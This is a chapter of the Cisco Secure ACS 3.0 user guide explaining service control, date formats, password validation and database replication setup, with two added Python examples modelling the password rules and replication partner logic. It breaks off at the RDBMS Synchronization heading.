Cisco Secure ACS 3.0 for Windows 2000/NT Servers User Guide
Establishing Cisco Secure ACS System Configuration

Table of Contents

Establishing Cisco Secure ACS System Configuration
Service Control
Logging
Date Format Control
Password Validation
CiscoSecure Database Replication
RDBMS Synchronization
Cisco Secure ACS Backup
Cisco Secure ACS System Restore
Cisco Secure ACS Active Service Management
IP Pools Server
IP Pools Address Recovery
VoIP Accounting Configuration
Cisco Secure ACS Certificate Setup
Certification Authority Setup
Global Authentication Setup

Establishing Cisco Secure ACS System Configuration


This chapter addresses the features found in the System Configuration section of Cisco Secure Access Control Server for Windows NT/2000 Servers Version 3.0 (Cisco Secure ACS).

It contains the following topics:

Service Control

Cisco Secure ACS comprises several Windows NT/2000 services. The Service Control page provides basic status information about the services, enables you to configure the service log files, and to stop or restart the services. For more information about Cisco Secure ACS services, see "Cisco Secure ACS Internal Architecture."

This section contains procedures for the following subjects:

You can also configure Cisco Secure ACS service logs. For more information, see the "Configuring Service Logs" section.

Determining the Status of Cisco Secure ACS Services

You can determine whether Cisco Secure ACS services are running or stopped by accessing the Service Control page.

To determine the status of Cisco Secure ACS services, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click Service Control.

Result: The status of the services appears in the CiscoSecure ACS on hostname table, where hostname is the name of the Cisco Secure ACS server.





Stopping, Starting, or Restarting Services

You can stop, start, or restart Cisco Secure ACS services as needed. This achieves the same result as starting and stopping Cisco Secure ACS services from within the Windows NT/2000 Control Panel. This stops, starts, or restarts all Cisco Secure ACS services except CSAdmin, which is responsible for the HTML interface.


Note    If the CSAdmin service needs to be restarted, you can do so using the Control Panel Services applet; however, it is best to allow Cisco Secure ACS to handle the services because there are dependencies in the order in which the services are started.

To stop, start, or restart Cisco Secure ACS services, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click Service Control.

Result: The status of the services appears in the CiscoSecure ACS on hostname table, where hostname is the name of the Cisco Secure ACS server.

If the services are running, the Restart and Stop buttons appear at the bottom of the page.

If the services are stopped, the Start button appears at the bottom of the page.

Step 3   Click Stop, Start, or Restart, as applicable.

Result: The status of Cisco Secure ACS services changes to the state appropriate to the button you clicked.





Logging

Cisco Secure ACS generates comma-separated value (CSV) log files by default, or ODBC log entries if so configured, for the administrative and accounting events of the protocols and options you have enabled. For more information, including configuration steps, see "Working with Logging and Reports."

Date Format Control

Cisco Secure ACS allows for one of two possible date formats in its logs, reports, and administrative interface. You can choose either a month/day/year format or a day/month/year format.

Setting the Date Format


Note   If you have reports that were generated before you changed the date format, be sure to move or rename them to avoid conflicts. For example, if you are using the month/day/year format, Cisco Secure ACS assigns the name 2001-07-12.csv to a report generated on July 12, 2001. If you subsequently change to the day/month/year format, on December 7, 2001, Cisco Secure ACS creates a file also named 2001-07-12.csv and overwrites the existing file.

To set the date format, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click Date Format Control.

Result: Cisco Secure ACS displays the Date Format Selection table.

Step 3   Select a date format option.

Step 4   Click Submit & Restart.

Result: Cisco Secure ACS restarts its services and implements the date format you selected.


Note   For the new date format to be seen in the HTML interface reports, you must restart the connection to the Cisco Secure ACS server. Click the Logoff button (a button with an X) in the upper-right corner of the browser window.





Password Validation

The Password Validation option enables you to configure validation parameters for user passwords. Cisco Secure ACS enforces these rules when an administrator changes a user password in the CiscoSecure user database and when a user attempts to change passwords using the CiscoSecure Authentication Agent applet.


Note   Password validation options apply only to user passwords stored in the CiscoSecure user database. They do not apply to passwords in user records kept in external user databases nor do they apply to enable or admin passwords for Cisco IOS network devices.

Setting Password Validation Options

The password validation options are listed below:

  • Password length between X and Y characters—Enforces that password lengths be between the values specified in the X and Y boxes, inclusive. Cisco Secure ACS supports passwords up to 32 characters in length.
  • Password may not contain the username—Requires that a user password does not contain the username anywhere within it.
  • Password is different from the previous value—Requires a user's new password to be different from the previous password.
  • Password must be alphanumeric—Requires a user password to contain both letters and numbers.

To configure password validation options, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click Password Validation.

Result: The Password Validation Options page appears.

Step 3   In Password length between X and Y characters, type the minimum valid number of characters for a password in the X box.

Step 4   In Password length between X and Y characters, type the maximum valid number of characters for a password in the Y box.

Step 5   To disallow passwords that contain the username, select the Password may not contain the username check box.

Step 6   To require that a user's password must be different from the user's previous password, select the Password is different from the previous value check box.

Step 7   To require that passwords must contain both letters and numbers, select the Password must be alphanumeric check box.

Step 8   Click Submit.

Result: Cisco Secure ACS restarts its services and implements the password validation settings you specified.
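The four validation options above, as an added Python example that is not Cisco code: a policy object mirrors the options on the Password Validation Options page, and a checker returns every rule a candidate password breaks. The default bounds, the case-insensitive username match, and the sample credentials are assumptions.

```python
from dataclasses import dataclass
from typing import List, Optional

MAX_SUPPORTED_LENGTH = 32  # the guide states ACS supports passwords up to 32 characters


@dataclass(frozen=True)
class PasswordPolicy:
    """One row of the Password Validation Options page (default values are assumed)."""
    min_length: int = 4            # the X box
    max_length: int = 32           # the Y box
    forbid_username: bool = True   # "Password may not contain the username"
    forbid_previous: bool = True   # "Password is different from the previous value"
    alphanumeric: bool = True      # "Password must be alphanumeric"


def policy_problems(policy: PasswordPolicy) -> List[str]:
    """Sanity-check the X and Y boxes before trusting the policy."""
    problems = []
    if policy.min_length < 1:
        problems.append("minimum length must be at least 1")
    if policy.max_length < policy.min_length:
        problems.append("Y (maximum) is smaller than X (minimum)")
    if policy.max_length > MAX_SUPPORTED_LENGTH:
        problems.append(f"Y exceeds the {MAX_SUPPORTED_LENGTH}-character limit")
    return problems


def validate_password(policy: PasswordPolicy, username: str, new_password: str,
                      previous_password: Optional[str] = None) -> List[str]:
    """Return the list of violated rules; an empty list means the password is acceptable."""
    failures = []
    length = len(new_password)
    if not policy.min_length <= length <= policy.max_length:
        failures.append(
            f"length {length} is outside {policy.min_length}..{policy.max_length}")
    # Assumption: the username check ignores case; the guide only says "anywhere within it".
    if policy.forbid_username and username and username.lower() in new_password.lower():
        failures.append("password contains the username")
    if policy.forbid_previous and previous_password is not None \
            and new_password == previous_password:
        failures.append("password is the same as the previous value")
    if policy.alphanumeric:
        has_letter = any(c.isalpha() for c in new_password)
        has_digit = any(c.isdigit() for c in new_password)
        if not (has_letter and has_digit):
            failures.append("password must contain both letters and numbers")
    return failures


if __name__ == "__main__":
    policy = PasswordPolicy(min_length=8)
    # Constructed sample change requests: (username, new password, previous password)
    for user, new, old in [("jdoe", "jdoe2001", "oldPass1"),
                           ("jdoe", "oldPass1", "oldPass1"),
                           ("jdoe", "c0rrectH0rse", "oldPass1")]:
        print(user, new, validate_password(policy, user, new, old) or "OK")
```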





CiscoSecure Database Replication

This section provides information about the CiscoSecure Database Replication feature, including procedures for implementing this feature and configuring the Cisco Secure ACS servers involved. This section contains the following topics:

About CiscoSecure Database Replication

Database replication helps make your AAA environment more fault tolerant. Database replication helps create mirror systems of Cisco Secure ACS servers by duplicating parts of the primary Cisco Secure ACS server setup to one or more secondary Cisco Secure ACS servers. You can configure your AAA clients to use these secondary Cisco Secure ACS servers if the primary Cisco Secure ACS server fails or is unreachable. With a secondary Cisco Secure ACS server whose CiscoSecure database is a replica of the primary Cisco Secure ACS server's CiscoSecure database, if the primary Cisco Secure ACS server goes out of service, incoming requests are authenticated without network downtime, provided that your AAA clients are configured to failover to the secondary Cisco Secure ACS server.

Database replication allows you to do the following:

  • Select the parts of the primary Cisco Secure ACS server's configuration to be replicated
  • Control the timing of the replication process, including creating schedules
  • Export selected configuration items from the primary system
  • Securely transport selected configuration data from the primary Cisco Secure ACS server to one or more secondary Cisco Secure ACS servers
  • Update the secondary Cisco Secure ACS servers to create matching configurations

With regard to database replication, we make the following distinctions about Cisco Secure ACS servers:

  • Primary Cisco Secure ACS server—A Cisco Secure ACS server that sends replicated CiscoSecure database components to other Cisco Secure ACS servers.
  • Secondary Cisco Secure ACS server—A Cisco Secure ACS server that receives replicated CiscoSecure database components from a primary Cisco Secure ACS server. In the HTML interface, these are identified as replication partners.

A Cisco Secure ACS server can be both a primary server and a secondary server, provided that it is not configured to be a secondary server to a Cisco Secure ACS server for which it performs as a primary server. Bidirectional replication, wherein a Cisco Secure ACS server both sends database components to and receives database components from the same remote Cisco Secure ACS server, is not supported.


Note   All Cisco Secure ACS servers involved in replication must run the same release of the Cisco Secure ACS software, including patch level. For example, if the primary Cisco Secure ACS server is running Cisco Secure ACS version 3.0.1, all secondary Cisco Secure ACS servers should be running Cisco Secure ACS version 3.0.1.

Replication Process

This section describes the database replication process as the interaction between a primary Cisco Secure ACS server and a single secondary Cisco Secure ACS server. The same process occurs between a primary Cisco Secure ACS server and each of its secondary Cisco Secure ACS servers.

The database replication process begins when the primary Cisco Secure ACS server compares the list of database components it is configured to replicate with the list of database components each secondary Cisco Secure ACS server is configured to replicate. The primary Cisco Secure ACS server only replicates those database components that it is configured to send and that the secondary Cisco Secure ACS server is configured to receive. If the secondary Cisco Secure ACS server is not configured to receive any of the components that the primary Cisco Secure ACS server is configured to send, the database replication is aborted.

After the primary Cisco Secure ACS server has determined which components to send to the secondary Cisco Secure ACS server, the replication process continues on the primary Cisco Secure ACS server as follows:

1. The primary Cisco Secure ACS server stops its authentication and creates a copy of the CiscoSecure database components that it is configured to replicate. During this step, if AAA clients are configured properly, those that usually use the primary Cisco Secure ACS server failover to another Cisco Secure ACS server.

2. The primary Cisco Secure ACS server resumes its authentication service. It also compresses and encrypts the copy of its database components for transmission to the secondary Cisco Secure ACS server.

3. The primary Cisco Secure ACS server transmits the compressed, encrypted copy of its database components to the secondary Cisco Secure ACS server. This transmission occurs over a TCP connection, using port 2000. The TCP session uses an encrypted, Cisco-proprietary protocol.

After the preceding events on the primary Cisco Secure ACS server, the database replication process continues on the secondary Cisco Secure ACS server as follows:

1. The secondary Cisco Secure ACS server receives the compressed, encrypted copy of the primary Cisco Secure ACS server's CiscoSecure database components. After transmission of the database components is complete, the secondary Cisco Secure ACS server uncompresses the database components.

2. The secondary Cisco Secure ACS server stops its authentication service and replaces its database components with the database components it received from the primary Cisco Secure ACS server. During this step, if AAA clients are configured properly, those that usually use the secondary Cisco Secure ACS server failover to another Cisco Secure ACS server.

3. The secondary Cisco Secure ACS server resumes its authentication service.

A Cisco Secure ACS server can act as both a primary server and a secondary server. Figure 8-1 shows a cascading replication scenario. Server 1 acts only as a primary Cisco Secure ACS server, replicating to servers 2 and 3, which act as secondary Cisco Secure ACS servers. After replication from server 1 to server 2 has completed, server 2 acts as a primary Cisco Secure ACS server while replicating to servers 4 and 5. Similarly, server 3 acts as a primary Cisco Secure ACS server while replicating to servers 6 and 7.


Figure 8-1   Cascading Database Replication


Replication Frequency

The frequency with which your Cisco Secure ACS servers replicate can have important implications for overall AAA performance. With shorter intervals between replications, a secondary server is more up-to-date with the primary server. This allows for a more current secondary Cisco Secure ACS server if the primary Cisco Secure ACS server fails, including a more current CiscoSecure user database.

There is a cost to having frequent replications. The greater the frequency of replication, the higher the load on a multi-server Cisco Secure ACS architecture and your network environment. Because Cisco Secure ACS transfers replicated data more often, network traffic load is much higher. Also, processing load on the synchronizing systems is increased. Replication consumes system resources, and the more often replication is repeated, the greater the impact on the Cisco Secure ACS server's AAA performance.

This issue is more apparent with large databases or frequently changing databases. Database replication is a non-incremental, destructive backup. In other words, it completely replaces the database and configuration on the secondary Cisco Secure ACS server every time it is run. Therefore, if the database being transferred is large, the amount of data being transferred can be substantial, and the processing overhead can also be large.

Important Implementation Considerations

Several important points bear consideration when implementing the CiscoSecure Database Replication feature:

  • Cisco Secure ACS only supports database replication to other Cisco Secure ACS servers. All Cisco Secure ACS servers participating in CiscoSecure database replication must run the same version and patch level of Cisco Secure ACS.
  • Only suitably configured, valid Cisco Secure ACS hosts can be secondary Cisco Secure ACS servers. To add a secondary Cisco Secure ACS server, configure the Cisco Secure ACS server in the AAA Servers table in the Network Configuration section. When a Cisco Secure ACS server is added to the AAA Servers table, it appears for selection as a secondary Cisco Secure ACS server in the AAA Servers list under Replication Partners on the CiscoSecure Database Replication page.
  • Replication to secondary Cisco Secure ACS servers takes place sequentially in the order listed in the Replication list under Replication Partners on the CiscoSecure Database Replication page.
  • The secondary Cisco Secure ACS server receiving the replicated components must be configured to accept database replication from the primary Cisco Secure ACS server. To configure a secondary Cisco Secure ACS server for database replication, see the "Configuring a Secondary Cisco Secure ACS Server" section.
  • Cisco Secure ACS does not support bidirectional database replication. The secondary Cisco Secure ACS server receiving the replicated components verifies that the primary Cisco Secure ACS server is not on its own Replication list. If the primary server is not on that list, the secondary Cisco Secure ACS server accepts the replicated components; if it is, the secondary Cisco Secure ACS server rejects them.
  • To replicate user-defined RADIUS vendor and vendor-specific attribute (VSA) configurations successfully, user-defined RADIUS vendor and VSA definitions to be replicated must be identical on the primary and secondary Cisco Secure ACS servers, including the RADIUS vendor slots that the user-defined RADIUS vendors occupy. For more information about user-defined RADIUS vendors and VSAs, see the "User-Defined RADIUS Vendors and VSA Sets" section.

Database Replication Versus Database Backup

Do not confuse database replication with system backup. Database replication is not a replacement for System Backup. While both features provide protection from partial or complete server loss, each feature addresses the issue in a different way.

System Backup archives data into a format that you can later use to restore the configuration if the system fails or the data becomes corrupted. The backup data is stored on the local hard drive and can be copied and removed from the system for long-term storage. You can store several generations of database backup files.

CiscoSecure Database Replication offers the convenience of copying various components of the CiscoSecure database to other Cisco Secure ACS servers. This can help you plan a failover AAA architecture and can help reduce the complexity of your configuration and maintenance tasks. While it is unlikely, it is possible that CiscoSecure Database Replication can propagate a corrupted database to the Cisco Secure ACS servers that generate your backup files.


Caution   The possibility of backing up a corrupted database exists regardless of whether you use CiscoSecure Database Replication. Because of this small risk, if you are using Cisco Secure ACS in mission-critical environments, we strongly recommend that you implement a backup plan that accounts for this possibility. For more information about backing up the Cisco Secure ACS system or the CiscoSecure database, see the "Cisco Secure ACS Backup" section and "Cisco Secure ACS Command-Line Database Utility."

Database replication provides fairly comprehensive replication of Cisco Secure ACS servers, but it does not replicate all the Cisco Secure ACS setup. Because Cisco Secure ACS relies on several communication dynamic link libraries (DLLs), database replication does not include external authentication sources. Because the system administrator manually determines which DLLs are installed, database replication cannot rely on the necessary DLLs being present on the replication partners. Use the Cisco Secure ACS System Backup feature to back up these parts of the Cisco Secure ACS configuration.

Database Replication Logging

Regardless of whether replication events succeed or fail, Cisco Secure ACS logs all replication events in two places:

  • The Windows NT/2000 Event Log
  • The Database Replication report

To view the Windows NT/2000 Event Log, use the Windows NT/2000 administration utilities. You can view recent reports in the Reports and Activity section of Cisco Secure ACS.

For more information about Cisco Secure ACS reports, see "Working with Logging and Reports."

Replication Options

The Cisco Secure ACS HTML interface provides three sets of options for configuring CiscoSecure Database Replication:

Replication Components Options

You can specify both the CiscoSecure database components that a Cisco Secure ACS server sends as a primary Cisco Secure ACS server and the components that it receives as a secondary Cisco Secure ACS server. To create a mirror system, all items must be selected.


Note   The CiscoSecure database components received by a secondary Cisco Secure ACS server overwrite the secondary Cisco Secure ACS server's own CiscoSecure database components. Any information unique to the overwritten database component is lost.

The options that control the components replicated appear in the Replication Components table on the CiscoSecure Database Replication page and are as follows:

  • User and group database—Replicate the information for groups and users.
  • AAA Servers and AAA Clients tables—Replicate the AAA Servers tables and the AAA Clients tables in the Network Configuration section.
  • Distribution table—Replicate the Proxy Distribution Table in the Network Configuration section.
  • Interface configuration—Replicate the Advanced Options settings from the Interface Configuration section.
  • Interface security settings—Replicate the security information for the Cisco Secure ACS HTML interface.
  • Password validation settings—Replicate the password validation settings.

If mirroring the entire database with a secondary Cisco Secure ACS server might send confidential information, such as the proxy distribution table, you can configure the primary Cisco Secure ACS server to send only a specific category of database information.


Note   Cisco Secure ACS does not replicate server certificates used for EAP-TLS authentication. Certificates are unique to a server; therefore, they are excluded from the replication process.

Replication Scheduling Options

You can specify when CiscoSecure database replication occurs. The options that control when replication occurs appear in the Replication Scheduling table on the CiscoSecure Database Replication page and are as follows:

  • Manually—Cisco Secure ACS does not perform automatic database replication.
  • Automatically Triggered Cascade—Cisco Secure ACS performs database replication to the configured list of secondary Cisco Secure ACS servers when database replication from a primary Cisco Secure ACS server completes. This enables you to build a propagation hierarchy of Cisco Secure ACS servers, relieving a primary Cisco Secure ACS server from the burden of propagating the replicated components to every other Cisco Secure ACS server. For an illustration of cascade replication, see Figure 8-1.
  • Every X minutes—Cisco Secure ACS performs, on a set frequency, database replication to the configured list of secondary Cisco Secure ACS servers. The unit of measurement is minutes, with a default update frequency of 60 minutes.
  • At specific times...—Cisco Secure ACS performs, at the time specified in the day and hour graph, database replication to the configured list of secondary Cisco Secure ACS servers. The minimum resolution is one hour, and the replication takes place on the hour selected.

Replication Partners Options

You can specify the Cisco Secure ACS servers for which a Cisco Secure ACS server performs as a primary Cisco Secure ACS server or as a secondary Cisco Secure ACS server. The options that control the Cisco Secure ACS servers with which a Cisco Secure ACS server is involved for replication appear in the Replication Partners table on the CiscoSecure Database Replication page and are as follows:

  • AAA Server—This list represents the AAA servers configured in the AAA Servers table in Network Configuration to which a Cisco Secure ACS server does not send replicated components.
  • Replication—This list represents the Cisco Secure ACS servers configured in the AAA Servers table in Network Configuration to which the Cisco Secure ACS server does send replicated components. These are Cisco Secure ACS servers for which the Cisco Secure ACS server you are configuring acts as a primary Cisco Secure ACS server.
  • Accept replication from—The Cisco Secure ACS server selected in this list is the Cisco Secure ACS server from which the current Cisco Secure ACS server does accept replicated components. If Any Known CiscoSecure ACS for Windows 2000/NT Server is selected, the Cisco Secure ACS server accepts replicated components from any Cisco Secure ACS server configured in the AAA Servers table in Network Configuration. This list defines whether this server acts as a secondary Cisco Secure ACS server for a single Cisco Secure ACS server or for all Cisco Secure ACS servers identified in the AAA Servers table.

Note   Cisco Secure ACS does not support bidirectional database replication. A secondary Cisco Secure ACS server receiving replicated components verifies that the primary Cisco Secure ACS server is not on its own Replication list. If the primary server is not on that list, the secondary Cisco Secure ACS server accepts the replicated components; if it is, the secondary Cisco Secure ACS server rejects them.

For more information about the AAA Servers table in Network Configuration, see the "AAA Server Configuration" section.
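The partner rules described in the Replication Process, Important Implementation Considerations and Replication Partners Options sections (matching version and patch level, both servers present in each other's AAA Servers table, the Accept replication from setting, rejection of bidirectional setups, and the send/receive intersection that must be non-empty), as an added Python model that is not Cisco code. The server names, the ANY_KNOWN marker and the sample cascade topology are constructed; the cascade simulation assumes downstream servers use Automatically Triggered Cascade scheduling.

```python
from dataclasses import dataclass, field
from typing import Dict, FrozenSet, List, Optional, Set, Tuple

# The six rows of the Replication Components table.
COMPONENTS = ("user_and_group_db", "aaa_servers_and_clients", "distribution_table",
              "interface_configuration", "interface_security", "password_validation")

# Stands for the "Any Known CiscoSecure ACS for Windows 2000/NT Server" choice (constructed marker).
ANY_KNOWN = "ANY_KNOWN"


@dataclass
class AcsServer:
    name: str
    version: str                                     # release including patch level, e.g. "3.0.1"
    aaa_servers: Set[str] = field(default_factory=set)   # entries in this server's AAA Servers table
    send: Set[str] = field(default_factory=set)          # components with Send checked
    receive: Set[str] = field(default_factory=set)       # components with Receive checked
    replication: List[str] = field(default_factory=list) # ordered Replication list (its secondaries)
    accept_from: Optional[str] = None                    # one server name, ANY_KNOWN, or None


def plan_replication(primary: AcsServer, secondary: AcsServer) -> Tuple[Set[str], str]:
    """Return (components that would be replicated, reason). An empty set means refused/aborted."""
    if primary.version != secondary.version:
        return set(), "version/patch level mismatch"
    if secondary.name not in primary.aaa_servers:
        return set(), "secondary not in primary's AAA Servers table"
    if primary.name not in secondary.aaa_servers:
        # Also covers Any Known: that choice is limited to servers in the AAA Servers table.
        return set(), "primary not in secondary's AAA Servers table"
    if secondary.accept_from not in (ANY_KNOWN, primary.name):
        return set(), "secondary does not accept replication from this primary"
    if primary.name in secondary.replication:
        return set(), "bidirectional replication rejected by secondary"
    components = primary.send & secondary.receive
    if not components:
        return set(), "no component is both sent and received; replication aborted"
    return components, "ok"


def run_cascade(servers: Dict[str, AcsServer], root: str) -> List[Tuple[str, str, FrozenSet[str], str]]:
    """Simulate a cascade from `root`: every server that receives components then replicates,
    in its own Replication list order, to its partners. Returns one (primary, secondary,
    components, reason) record per attempted replication."""
    log = []
    queue, seen = [root], {root}
    while queue:
        primary = servers[queue.pop(0)]
        for name in primary.replication:           # sequential, in list order
            comps, reason = plan_replication(primary, servers[name])
            log.append((primary.name, name, frozenset(comps), reason))
            if comps and name not in seen:         # triggered cascade on a successful receive
                seen.add(name)
                queue.append(name)
    return log


def example_topology() -> Dict[str, AcsServer]:
    """Constructed sample: Figure 8-1 trimmed to servers 1, 2 and 4, plus a misconfigured server 3
    that lists its own primary as a secondary (bidirectional, so it is rejected)."""
    everything = set(COMPONENTS)
    acs1 = AcsServer("acs1", "3.0.1", aaa_servers={"acs2", "acs3"}, send=everything,
                     replication=["acs2", "acs3"])
    acs2 = AcsServer("acs2", "3.0.1", aaa_servers={"acs1", "acs4"}, send=everything,
                     receive=everything, replication=["acs4"], accept_from="acs1")
    acs3 = AcsServer("acs3", "3.0.1", aaa_servers={"acs1"}, receive={"user_and_group_db"},
                     replication=["acs1"], accept_from=ANY_KNOWN)
    acs4 = AcsServer("acs4", "3.0.1", aaa_servers={"acs2"},
                     receive={"user_and_group_db", "password_validation"}, accept_from=ANY_KNOWN)
    return {s.name: s for s in (acs1, acs2, acs3, acs4)}


if __name__ == "__main__":
    for primary, secondary, comps, reason in run_cascade(example_topology(), "acs1"):
        print(f"{primary} -> {secondary}: {reason} {sorted(comps)}")
```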

Implementing Primary and Secondary Replication Setups on Cisco Secure ACS Servers

If you implement a replication scheme that uses cascading replication, the Cisco Secure ACS server configured to replicate only when it has received replicated components from another Cisco Secure ACS server acts both as a primary Cisco Secure ACS server and as a secondary Cisco Secure ACS server. First, it acts as a secondary Cisco Secure ACS server while it receives replicated components, and then it acts as a primary Cisco Secure ACS server while it replicates components to other Cisco Secure ACS servers. For an illustration of cascade replication, see Figure 8-1.

To implement primary and secondary replication setups on Cisco Secure ACS servers, follow these steps:


Step 1   On each secondary Cisco Secure ACS server, follow these steps:

a. In the Network Configuration section, add the primary Cisco Secure ACS server to the AAA Servers table.

For more information about adding entries to the AAA Servers table, see the "AAA Server Configuration" section.

b. Configure the secondary Cisco Secure ACS server to receive replicated components. For instructions, see the "Configuring a Secondary Cisco Secure ACS Server" section.

Step 2   On the primary Cisco Secure ACS server, follow these steps:

a. In the Network Configuration section, add each secondary Cisco Secure ACS server to the AAA Servers table.

For more information about adding entries to the AAA Servers table, see the "AAA Server Configuration" section.

b. To replicate according to a schedule, at intervals, or whenever the primary Cisco Secure ACS server has received replicated components from another Cisco Secure ACS server, see the "Scheduling Replication" section.

c. To initiate replication immediately, see the "Replicating Immediately" section.





Configuring a Secondary Cisco Secure ACS Server


Note   If this feature does not appear, click Interface Configuration, click Advanced Options, and select the CiscoSecure ACS Database Replication check box. Also, verify that the Distributed System Settings check box is selected; if not, select the Distributed System Settings check box.

The CiscoSecure Database Replication feature requires that you configure Cisco Secure ACS servers that are to receive replication components, that is, that you configure Cisco Secure ACS servers to act as secondary Cisco Secure ACS servers. The components that a secondary Cisco Secure ACS server is to receive must be explicitly specified, as must be its primary Cisco Secure ACS server or servers.

Replication is always initiated by the primary Cisco Secure ACS server. For more information about sending replication components, see the "Replicating Immediately" section or the "Scheduling Replication" section.


Caution   The CiscoSecure database components received by a secondary Cisco Secure ACS server overwrite the secondary Cisco Secure ACS server's own CiscoSecure database components. Any information unique to the overwritten database component is lost.

To configure a Cisco Secure ACS server to be a secondary Cisco Secure ACS server, follow these steps:


Step 1   Log in to the secondary Cisco Secure ACS server's HTML interface.

Step 2   In the navigation bar, click System Configuration.

Step 3   Click CiscoSecure Database Replication.

Result: The Database Replication Setup page appears.

Step 4   Select the Receive check box for each database component to be received from a primary Cisco Secure ACS server.

For more information about replication components, see the "Replication Components Options" section.

Step 5   If the secondary Cisco Secure ACS server is to receive replication components from only one primary Cisco Secure ACS server, from the Accept replication from list, select the other Cisco Secure ACS server name.


Note    The primary Cisco Secure ACS servers available in the Accept replication from list are determined by the AAA Servers table in the Network Configuration section. For more information about the AAA Servers table, see the "AAA Server Configuration" section.

Step 6   If the secondary Cisco Secure ACS server is to receive replication components from more than one primary Cisco Secure ACS server, from the Accept replication from list, select Any Known CiscoSecure ACS for Windows 2000/NT Server.

The Any Known CiscoSecure ACS for Windows 2000/NT Server option is limited to the Cisco Secure ACS servers listed in the AAA Servers table in Network Configuration.

Step 7   Click Submit.

Result: Cisco Secure ACS saves the replication configuration, and at the frequency or times you specified, Cisco Secure ACS begins accepting the replicated components from the other Cisco Secure ACS servers you specified.





Replicating Immediately

You can manually start database replication.


Note   Replication cannot occur until you have configured at least one secondary Cisco Secure ACS server. For more information about configuring a secondary Cisco Secure ACS server, see the "Configuring a Secondary Cisco Secure ACS Server" section.

To initiate database replication immediately, follow these steps:


Step 1   Log in to the primary Cisco Secure ACS server's HTML interface.

Step 2   In the navigation bar, click System Configuration.

Step 3   Click CiscoSecure Database Replication.


Note    If this feature does not appear, click Interface Configuration, click Advanced Options, and select the CiscoSecure ACS Database Replication check box. Also, verify that the Distributed System Settings check box is selected; if not, select the Distributed System Settings check box.

Result: The Database Replication Setup page appears.

Step 4   For each CiscoSecure database component you want to replicate to a secondary Cisco Secure ACS server, under Replication Components, select the corresponding Send check box.

Step 5   For each secondary Cisco Secure ACS server to which you want the primary Cisco Secure ACS server to replicate its selected components, select the secondary Cisco Secure ACS server in the AAA Servers list, and then click —> (right arrow button).

Step 6   To remove secondary Cisco Secure ACS servers from the Replication list, select the secondary Cisco Secure ACS server in the Replication list, and then click <— (left arrow button).

Result: The selected secondary Cisco Secure ACS server appears in the AAA Servers list.

Step 7   At the bottom of the browser window, click Replicate Now.

Result: Cisco Secure ACS saves the replication configuration. Cisco Secure ACS immediately begins sending replicated database components to the secondary Cisco Secure ACS servers you specified.





Scheduling Replication

You can schedule when a primary Cisco Secure ACS server sends its replication components to a secondary Cisco Secure ACS server. For more information about replication scheduling options, see the "Configuring a Secondary Cisco Secure ACS Server" section.


Note   Replication cannot occur until the secondary Cisco Secure ACS servers are configured properly. For more information about receiving replication components, see the "Configuring a Secondary Cisco Secure ACS Server" section.

To schedule when a primary Cisco Secure ACS server replicates to its secondary Cisco Secure ACS servers, follow these steps:


Step 1   Log in to the primary Cisco Secure ACS server's HTML interface.

Step 2   In the navigation bar, click System Configuration.

Step 3   Click CiscoSecure Database Replication.


Note    If this feature does not appear, click Interface Configuration, click Advanced Options, and select the CiscoSecure ACS Database Replication check box. Also, verify that the Distributed System Settings check box is selected; if not, select the Distributed System Settings check box.

Result: The Database Replication Setup page appears.

Step 4   To specify which CiscoSecure database components the primary Cisco Secure ACS server is to send to its secondary Cisco Secure ACS servers, under Replication Components, select the corresponding Send check box for each database component to be sent.

For more information about replication components, see the "Replication Components Options" section.

Step 5   To have the primary Cisco Secure ACS server send replication components to its secondary Cisco Secure ACS servers at regular intervals, under Replication Scheduling, select the Every X minutes option and in the X box type the length of the interval at which Cisco Secure ACS should perform replication.


Note    Because Cisco Secure ACS is momentarily shut down during replication, a short replication interval may cause frequent failover of your AAA clients to other Cisco Secure ACS servers. If AAA clients are not properly configured to failover to other Cisco Secure ACS servers, the brief interruption in authentication service may prevent users from authenticating.

Step 6   To schedule times at which the primary Cisco Secure ACS server sends its replication components to its secondary Cisco Secure ACS servers, follow these steps:

a. Under Replication Scheduling, select the At specific times option.

b. In the day and hour graph, click the times at which you want Cisco Secure ACS to perform replication.


Tip Clicking times of day on the graph selects those times; clicking again clears them. At any time you can click Clear All to clear all hours, or you can click Set All to select all hours.

Step 7   To have the primary Cisco Secure ACS server send replication components immediately upon receiving replication components from another Cisco Secure ACS server, select the Automatically triggered cascade option.


Note    If you specify the Automatically triggered cascade option, you must configure another Cisco Secure ACS server to act as a primary Cisco Secure ACS server to this server; otherwise, this Cisco Secure ACS server never replicates to its secondary Cisco Secure ACS servers.

Step 8   To specify the secondary Cisco Secure ACS servers for the primary Cisco Secure ACS server, follow these steps:


Note    For more information about replication partners, see the "Replication Partners Options" section.

a. In the Replication Partners table, from the AAA Servers list, select the name of a secondary Cisco Secure ACS server to which you want the primary Cisco Secure ACS server to send its selected replication components.


Note    The secondary Cisco Secure ACS servers available in the AAA Servers list are determined by the AAA Servers table in Network Configuration. For more information about the AAA Servers table, see the "AAA Server Configuration" section.

b. Click —> (right arrow button).

Result: The selected secondary Cisco Secure ACS server moves to the Replication list.

c. Repeat Steps a and b for each secondary Cisco Secure ACS server to which you want the primary Cisco Secure ACS server to send its selected replication components.

d. If you move more than one secondary Cisco Secure ACS server to the Replication list, assign the order in which the primary Cisco Secure ACS replicates to them. Click Up and Down to move selected Cisco Secure ACS servers in the Replication list until you have created the order you want.

Step 9   Click Submit.

Result: Cisco Secure ACS saves the replication configuration you created.





Disabling CiscoSecure Database Replication

You can disable scheduled CiscoSecure database replications without losing the schedule itself. This allows you to cease scheduled replications temporarily and later resume them without having to re-enter the schedule information.

To disable CiscoSecure database replication, follow these steps:


Step 1   Log in to the primary Cisco Secure ACS server's HTML interface.

Step 2   In the navigation bar, click System Configuration.

Step 3   Click CiscoSecure Database Replication.

Result: The Database Replication Setup page appears.

Step 4   In the Replication Components table, clear all check boxes.

Step 5   In the Replication Scheduling table, select the Manually option.

Step 6   Click Submit.

Result: Cisco Secure ACS does not permit any replication to or from this Cisco Secure ACS server.





Database Replication Event Error Alert Notification

If replication fails, Cisco Secure ACS displays an error message in red at the top of the Database Replication page. In addition to error notification, the message also displays the error code generated by the last unsuccessful run and suggests you check the error log messages generated for previous failures. To acknowledge and close the message, click OK.

RDBMS Synchronization

This section provides information about the RDBMS Synchronization feature, including procedures for implementing this feature, both within Cisco Secure ACS and the external data source involved. This section contains the following topics:

